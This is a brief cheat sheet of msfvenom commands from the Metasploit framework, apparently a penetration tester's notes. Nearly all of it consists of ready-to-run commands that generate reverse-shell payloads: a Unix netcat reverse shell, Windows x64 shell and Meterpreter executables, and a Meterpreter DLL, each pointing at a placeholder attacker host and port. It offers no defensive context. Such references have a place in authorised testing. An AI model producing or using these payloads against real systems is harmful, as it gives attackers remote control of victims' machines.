https://github.com/rapid7/metasploit-framework/blob/master/msfvenom

MSFVENOM Base

Payloads naming convention : [OS]/[arch]/[payload]

msfvenom --list payloads
List payloads.

MSFVENOM Linux Reverse Shell

msfvenom -p cmd/unix/reverse_netcat LHOST=[ATTACKER_OP] LPORT=[ATTACKER_PORT]
Generate a Linux reverse shell.

MSFVENOM Windows Reverse Shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a reverse shell exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a meterpreter reverse shell exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f dll -o shell.dll
Generate a meterpreter reverse shell DLL.